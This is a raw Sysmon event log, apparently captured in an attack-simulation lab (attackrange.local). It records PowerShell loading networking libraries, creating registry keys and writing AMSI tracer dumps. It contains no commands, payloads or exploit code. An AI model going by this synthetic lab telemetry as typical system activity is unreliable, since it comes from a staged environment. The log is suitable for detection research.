17:30:14.045{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061095Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:14.029{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DCB35D914D05A736836F55431F8DA6,SHA256=12472EAB58C817FE389F77966F6FB636480900B1CE628255EE9B0A4E98F15722,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061101Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:15.046{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061100Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:15.046{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061099Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:15.039{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203A9FD7C46C9C72B24CCD80A55C3F9B,SHA256=1CCACC08D52701AB313B4DE4C7BBB3D7BF83244718D971DEF3B1CA3A727146A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001530871Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.968{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530870Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.968{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001530869Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.967{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 534500x80000000000000001530868Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.966{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exe 12241200x80000000000000001530867Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-DeleteKey2021-04-21 17:30:15.949{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498 13241300x80000000000000001530866Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.949{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530865Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.949{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkrBinary Data 10341000x80000000000000001530864Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530863Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 534500x80000000000000001530862Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 734700x80000000000000001530861Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 11241100x80000000000000001530860Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive2021-04-19 12:25:39.286 23542300x80000000000000001530859Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CFfalsefalse - insufficient disk space 11241100x80000000000000001530858Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454640_powershell.exe_1572_4524_11.dmp2021-04-21 17:30:15.949 11241100x80000000000000001530857Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.933{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454649_powershell.exe_1572_4524_10.dmp2021-04-21 17:30:15.933 11241100x80000000000000001530856Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.933{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454657_powershell.exe_1572_4524_9.dmp2021-04-21 17:30:15.933 11241100x80000000000000001530855Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.917{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454672_powershell.exe_1572_4524_8.dmp2021-04-21 17:30:15.917 11241100x80000000000000001530854Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.917{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454673_powershell.exe_1572_4524_7.dmp2021-04-21 17:30:15.917 11241100x80000000000000001530853Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.902{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454676_powershell.exe_1572_4524_6.dmp2021-04-21 17:30:15.902 11241100x80000000000000001530852Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.902{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454684_powershell.exe_1572_4524_5.dmp2021-04-21 17:30:15.902 11241100x80000000000000001530851Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.886{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454703_powershell.exe_1572_4524_4.dmp2021-04-21 17:30:15.886 734700x80000000000000001530850Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.871{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\diasymreader.dll14.8.3761.0 built by: NET48REL1Dia based SymReaderMicrosoft® .NET FrameworkMicrosoft Corporationdiasymreader.dllMD5=83673A2EC60EF42E8B88D3EE2763437C,SHA256=1F4A8B06F0DCB87F684EFE81FAB704C739C79B188A2C373D6B7ACB148AB4CFF6trueMicrosoft CorporationValid 12241200x80000000000000001530849Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.871{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL 734700x80000000000000001530848Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.871{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\schannel.dll10.0.14393.4225 (rs1_release.210127-1811)TLS / SSL Security ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationschannel.dllMD5=2562B81E255EB6DF8497402ABC6C59BB,SHA256=340532C238CA5B84BA9D7A2DB4D1CCD58D869FECC44A463A93F54C974E1B41F4trueMicrosoft WindowsValid 734700x80000000000000001530847Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.866{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x80000000000000001530846Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530845Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530844Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530843Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x80000000000000001530842Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530841Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530840Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.864{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530839Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OnDemandConnRouteHelper.dll10.0.14393.4169 (rs1_release.210107-1130)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=BAE78E97BEBB832376654560305922E3,SHA256=6A188DC4F1005E46CCA529E9C757D9B3B5F98E5587AFAA5E4200C7DD2AC73355trueMicrosoft WindowsValid 734700x80000000000000001530838Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\winhttp.dll10.0.14393.4169 (rs1_release.210107-1130)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=24995B62FFC2519B34A2145673BD275F,SHA256=BB7D4DE1BE6111462F65F999A8969DA04113F15A80D534A93D3CCC76A9FE1F22trueMicrosoft WindowsValid 734700x80000000000000001530837Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 12241200x80000000000000001530836Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Tracing 734700x80000000000000001530835Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rtutils.dll10.0.14393.3930 (rs1_release.200901-1914)Routing UtilitiesMicrosoft® Windows® Operating SystemMicrosoft CorporationRTUTILS.DLLMD5=7F8BC94C915BD52D3422C5AD11389CEF,SHA256=68012DC490FEB77A313007FB1C3EC3F158A5C339AE620DC869B192EDAAED545BtrueMicrosoft WindowsValid 734700x80000000000000001530834Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasman.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access Connection ManagerMicrosoft® Windows® Operating SystemMicrosoft CorporationRasman.dllMD5=B07D32F44DFADC6EB9BBAFA1783B8468,SHA256=C412A22F84E06BA8B13BC53BBA263F066C0152261198FA74D6C3D7D18BB470E9trueMicrosoft WindowsValid 734700x80000000000000001530833Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasapi32.dll10.0.14393.4283 (rs1_release.210303-1802)Remote Access APIMicrosoft® Windows® Operating SystemMicrosoft Corporationrasapi32.dllMD5=4AD563CA721F138B52B98887B7A6F484,SHA256=054C99FD96437F0C40F8B9A6342DC80006D3509D024A9591BEBA0DD314C9FCB5trueMicrosoft WindowsValid 12241200x80000000000000001530832Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530831Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530830Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530829Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530828Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530827Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\winnsi.dll10.0.14393.2339 (rs1_release_inmarket.180611-1502)Network Store Information RPC interfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationwinnsi.dllMD5=25B3BD4D63460EE4599F5631C1B83D21,SHA256=07E055D47940F09CB7EB512D52672C944D7D2F035A2F45766319871C0862C5B1trueMicrosoft WindowsValid 734700x80000000000000001530826Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\dhcpcsvc.dll10.0.14393.3930 (rs1_release.200901-1914)DHCP Client ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc.dllMD5=CD3B9633BBEF2102C4665A2C39EC0B1A,SHA256=341EFB4806BE39E09AA90CA3B069C39F2A9D61FA9B512350B2721D41875AFCAEtrueMicrosoft WindowsValid 734700x80000000000000001530825Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\dhcpcsvc6.dll10.0.14393.3930 (rs1_release.200901-1914)DHCPv6 ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc6.dllMD5=1721EAC44BCFC7177AA664ADCA514F23,SHA256=C099BCCE44A04A48147DE8CF093EBF997510154113789BF31394B5148F60B375trueMicrosoft WindowsValid 12241200x80000000000000001530824Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530823Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530822Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000001530821Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000001530820Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 11241100x80000000000000001530819Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454754_powershell.exe_1572_4524_3.dmp2021-04-21 17:30:15.833 12241200x80000000000000001530818Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530817Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530816Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530815Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530814Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530813Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530812Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530811Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530810Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 